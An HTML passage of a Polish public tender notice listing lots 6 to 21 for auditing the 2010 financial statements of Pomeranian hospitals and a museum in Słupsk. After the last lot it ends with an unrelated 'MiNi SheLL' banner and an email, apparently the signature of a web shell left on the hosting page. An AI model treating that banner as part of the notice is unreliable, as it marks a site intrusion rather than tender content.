<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Badanie sprawozdania finansowego sporządzonego na dzień 31 grudnia 2010 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.21.21.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.04.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Muzeum Pomorza Środkowego w Słupsku
ul. Dominikańska 5-9		76-200	Słupsk.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Badanie sprawozdania finansowego sporządzonego na dzień 31 grudnia 2010 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.21.21.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.04.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Szpital Specjalistyczny św. Wojciecha
Al. Jana Pawła II 50		80-462	Gdańsk.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Badanie sprawozdania finansowego sporządzonego na dzień 31 grudnia 2010 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.21.21.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 12.05.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Wojewódzki Szpital Specjalistyczny im. Janusza Korczaka
Ul. Prof. Lotha 26		76-200	Słupsk.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Badanie sprawozdania finansowego sporządzonego na dzień 31 grudnia 2010 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.21.21.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 12.05.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Pomorskie Centrum Traumatologii im. Mikołaja Kopernika 
Ul. Nowe Ogrody 1-6		80-803	Gdańsk.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Badanie sprawozdania finansowego sporządzonego na dzień 31 grudnia 2010 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.21.21.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 12.05.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Szpital Specjalistyczny im. Floriana Ceynowy
ul. Dr A. Jagalskiego 10		84-200	Wejherowo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Badanie sprawozdania finansowego sporządzonego na dzień 31 grudnia 2010 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.21.21.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 25.04.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Szpital Morski im. PCK
Ul. Powstania Styczniowego 1		81-519 	Gdynia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Badanie sprawozdania finansowego sporządzonego na dzień 31 grudnia 2010 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.21.21.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 25.04.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Szpital Miejski im. J. Brudzińskiego
Ul. Wójta Radkego 1		81-348	Gdynia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Badanie sprawozdania finansowego sporządzonego na dzień 31 grudnia 2010 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.21.21.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 25.04.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Szpital Specjalistyczny
Ul. Piechowskiego 36		83-400	Kościerzyna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Badanie sprawozdania finansowego sporządzonego na dzień 31 grudnia 2010 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.21.21.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 12.05.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Pomorskie Centrum Chorób Zakaźnych i Gruźlicy
Ul. Smoluchowskiego 18		80-214	Gdańsk.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Badanie sprawozdania finansowego sporządzonego na dzień 31 grudnia 2010 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.21.21.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 25.04.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Szpital Specjalistyczny
Ul. Kuracyjna 30		82-550	Prabuty.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Badanie sprawozdania finansowego sporządzonego na dzień 31 grudnia 2010 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.21.21.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 25.04.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Specjalistyczny Zespół Opieki Zdrowotnej nad Matką i Dzieckiem
Ul. Polanki 119		80-308	Gdańsk.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Badanie sprawozdania finansowego sporządzonego na dzień 31 grudnia 2010r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.21.21.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 25.04.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Wojewódzki Zespół Reumatologiczny im. dr Jadwigi Titz-Kosko 
Ul. Grunwaldzka 1-3		81-759	Sopot.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Badanie sprawozdania finansowego sporządzonego na dzień 31 grudnia 2010 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.21.21.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 25.04.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Szpital dla Nerwowo i Psychicznie Chorych im. Stanisława Kryzana
Ul. Skarszewska 7		83-200	Starogard Gdański.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Badanie sprawozdania finansowego sporządzonego na dzień 31 grudnia 2010 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.21.21.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 25.04.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> Wojewódzki Szpital Psychiatryczny im. prof. T. Bilikiewicza 
Ul. Srebrniki 1		80-282	Gdańsk.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Badanie sprawozdania finansowego sporządzonego na dzień 31 grudnia 2010 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.21.21.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 25.04.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> Wojewódzkie Centrum Onkologii
Ul. M. Skłodowskiej-Curie		80-210	Gdańsk.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Badanie sprawozdania finansowego sporządzonego na dzień 31 grudnia 2010 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.21.21.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 25.04.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com